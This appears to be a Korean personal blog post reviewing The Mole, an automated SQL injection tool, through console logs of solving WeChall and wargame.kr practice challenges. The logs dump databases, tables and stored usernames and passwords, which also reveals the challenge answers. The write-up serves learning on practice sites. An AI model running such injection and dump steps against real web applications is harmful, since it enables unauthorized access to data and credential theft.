Pentest

The Mole

Leave a comment on The Mole

SQL Injection 관련 툴이 있어 간단한 사용기를 작성합니다.

The Mole (Digging up your data) : http://themole.nasel.com.ar/

문제는 WeChall의 Table 이름을 찾는 문제를 대상으로 해당 툴을 이용해 풀이를 해보도록 하겠습니다.
실행 후 Tab 키를 누르면 여러 옵션을 설정할 수 있음을 알 수 있습니다.
옵션이 다양해서 아주 범용적으로 사용할 수 있을거 같네요.

C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe
                     _____ _           ___  ___      _
                    |_   _| |          |  \/  |     | |
                      | | | |__   ___  | .  . | ___ | | ___
                      | | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
                      | | | | | |  __/ | |  | | (_) | |  __/
                      \_/ |_| |_|\___| \_|  |_/\___/|_|\___|

 Developed by Nasel(http://www.nasel.com.ar).
 Published under GPLv3.
 Be efficient and have fun!

#> url http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login
#> needle Welcome
#> injectable_field GET username
#> schemas
[i] Trying injection using 0 parenthesis.
[i] Trying separator: "'"
[+] Found separator: "'"
[i] Trying DBMS Mysql
[+] Found DBMS: Mysql
[i] Trying injection using 0 parenthesis.
[i] Trying injection using comment: #
[+] Found comment delimiter: "#"
[+] Query columns count: 3
[+] Trying finger 1/2
[+] Injectable fields found: [1, 3]
[i] Trying to inject in field 1
[+] Found injectable field: 1
[+] Using string union technique.
[+] Rows: 2
[*] Dumped 2/2 rows.
+--------------------+
| Databases          |
+--------------------+
| gizmore_tableu61   |
| information_schema |
+--------------------+
#> tables gizmore_tableu61
[+] Rows: 2
[*] Dumped 2/2 rows.
+--------------+
| Tables       |
+--------------+
| aaawrong     |
| usertableus4 |
+--------------+
#> columns gizmore_tableu61 aaawrong
[+] Rows: 2
[*] Dumped 2/2 rows.
+----------------------------+
| Columns for table aaawrong |
+----------------------------+
| test                       |
| username                   |
+----------------------------+
#> query gizmore_tableu61 aaawrong test,username
+-----------------+
| test | username |
+-----------------+
+-----------------+
#> columns gizmore_tableu61 usertableus4
[+] Rows: 3
[*] Dumped 3/3 rows.
+--------------------------------+
| Columns for table usertableus4 |
+--------------------------------+
| message                        |
| password                       |
| username                       |
+--------------------------------+
#> query gizmore_tableu61 usertableus4 message,password,username
[+] Rows: 5
[*] Dumped 5/5 rows.
+------------------------------------------------------------------------------------------+
| message                                                            | password | username |
+------------------------------------------------------------------------------------------+
| Hello Peter><thismypass><Aaron A. Aaronson             |
| Let`s have a bbq!><tamethepenguin><quangntenemy        |
| This is a demo account, nothing here.><test><test      |
| WTF><tables><nancy                                     |
| Welcome Back><themoreyouknowthemoreyoucanforget><Admin |
+------------------------------------------------------------------------------------------+
#>

내친김에 wargame.kr 의 문제도 풀어보겠습니다. 여기 문제는 POST로 인자를 전송해야 합니다.

C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe
                     _____ _           ___  ___      _
                    |_   _| |          |  \/  |     | |
                      | | | |__   ___  | .  . | ___ | | ___
                      | | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
                      | | | | | |  __/ | |  | | (_) | |  __/
                      \_/ |_| |_|\___| \_|  |_/\___/|_|\___|

 Developed by Nasel(http://www.nasel.com.ar).
 Published under GPLv3.
 Be efficient and have fun!

#> url http://wargame.kr:8084/prob/9/chk.php
#> method POST idx=1532
#> needle 2011-12-12 18:24:17
#> injectable_field POST idx
#> schemas
[i] Trying injection using 0 parenthesis.
[i] Trying separator: "'"
[i] Trying separator: """
[i] Trying separator: " "
[+] Found separator: " "
[i] Trying DBMS Mysql
[+] Found DBMS: Mysql
[i] Trying injection using 0 parenthesis.
[i] Trying injection using comment: #
[+] Found comment delimiter: "#"
[+] Query columns count: 1
[+] Trying finger 1/2
[+] Trying finger 2/2
[-] Could not find injectable field.
[+] Using blind mode.
[+] Found row count: 2
[+] Guessed length: 18
information_schema
[+] Guessed length: 11
p9_blueh4g3
+--------------------+
| Databases          |
+--------------------+
| information_schema |
| p9_blueh4g3        |
+--------------------+
#> tables p9_blueh4g3
[+] Found row count: 2
[+] Guessed length: 11
admin_table
[+] Guessed length: 8
ip_table
+-------------+
| Tables      |
+-------------+
| admin_table |
| ip_table    |
+-------------+
#> columns p9_blueh4g3 admin_table
[+] Found row count: 3
[+] Guessed length: 3
idx
[+] Guessed length: 2
id
[+] Guessed length: 2
ps
+-------------------------------+
| Columns for table admin_table |
+-------------------------------+
| id                            |
| idx                           |
| ps                            |
+-------------------------------+
#> query p9_blueh4g3 admin_table id,idx,ps
[+] Found row count: 1
[+] Guessed length: 25
blue_admin><1><0h~myp4ss!
+-------------------------------+
| id         | idx | ps         |
+-------------------------------+
| blue_admin | 1   | 0h~myp4ss! |
+-------------------------------+
#>

아주 ㄷㄷㄷ한 툴이네요.

ByJJoon

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다